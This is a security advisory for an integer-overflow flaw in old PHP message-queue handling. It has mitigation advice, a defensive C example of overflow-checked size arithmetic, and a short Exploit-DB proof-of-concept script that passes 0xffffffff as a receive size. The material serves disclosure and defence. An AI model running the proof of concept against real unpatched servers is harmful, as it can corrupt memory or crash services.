Vendor: PHP
By: Unknown
CVSS: 7.5 (HIGH)
CWE: 190 (Integer-Overflow)
Product Name: PHP
Affected Version From: PHP versions prior to 4.4.5 and 5.2.1
Affected Version To: Unknown
Patch Exists: YES
Related CWE: Unknown
CPE: a:php:php
Platforms Tested: Unknown

Integer-Overflow Vulnerability in PHP

PHP is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to cause a buffer overflow and to corrupt process memory. Exploiting this issue may allow attackers to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in a denial-of-service condition.

Mitigation:

Update PHP to version 4.4.5 or 5.2.1 or later. Additionally, ensure that integer values are properly validated and handled to prevent integer-overflow vulnerabilities.
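
The size validation named in the mitigation, as an added C example that is not PHP's source and not part of the original advisory. It assumes a receive buffer sized as a fixed header plus a caller-supplied maximum, and shows how a value such as the 0xffffffff in the proof of concept below wraps the unchecked sum; HDR_SIZE, MAX_PAYLOAD and all function names are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Illustrative layout, not PHP source: a fixed header followed by payload. */
#define HDR_SIZE    8u       /* assumed header size */
#define MAX_PAYLOAD 65536u   /* assumed policy limit for one message */

/* uint32_t models a 32-bit size type so the wrap is the same on any host. */
uint32_t size_unchecked(uint32_t max_size)
{
    return (uint32_t)(HDR_SIZE + max_size);   /* wraps modulo 2^32 */
}

/* Returns 0 and sets *total, or -1 when max_size must be rejected. */
int size_checked(uint32_t max_size, uint32_t *total)
{
    if (max_size > UINT32_MAX - HDR_SIZE)     /* addition would wrap */
        return -1;
    if (max_size > MAX_PAYLOAD)               /* above the policy limit */
        return -1;
    *total = HDR_SIZE + max_size;
    return 0;
}

/* Allocates header + payload space only for an accepted size. */
void *msg_buf_new(uint32_t max_size)
{
    uint32_t total;
    if (size_checked(max_size, &total) != 0)
        return NULL;
    return calloc(1, total);
}

int main(void)
{
    uint32_t total = 0;
    printf("unchecked(0xffffffff) = %u bytes\n", (unsigned)size_unchecked(0xffffffffu));
    printf("checked(0xffffffff)   = %d\n", size_checked(0xffffffffu, &total));
    if (size_checked(32u, &total) == 0)
        printf("checked(32)           = %u bytes\n", (unsigned)total);
    void *buf = msg_buf_new(32u);
    printf("msg_buf_new(32) %s\n", buf ? "ok" : "rejected");
    free(buf);
    return 0;
}
```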

Source:

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23236/info

This issue affects PHP versions prior to 4.4.5 and 5.2.1. 

<?php

  $MSGKEY = 519052;

  $msg_id = msg_get_queue ($MSGKEY, 0600);

  if (!msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err))
    echo "Msg not sent because $msg_err\n";

  // maxsize (4th argument) is set to 0xffffffff
  if (msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) {
    echo "$msg\n";
  } else {
    echo "Received $msg_error fetching message\n";
  }

  msg_remove_queue ($msg_id);

?>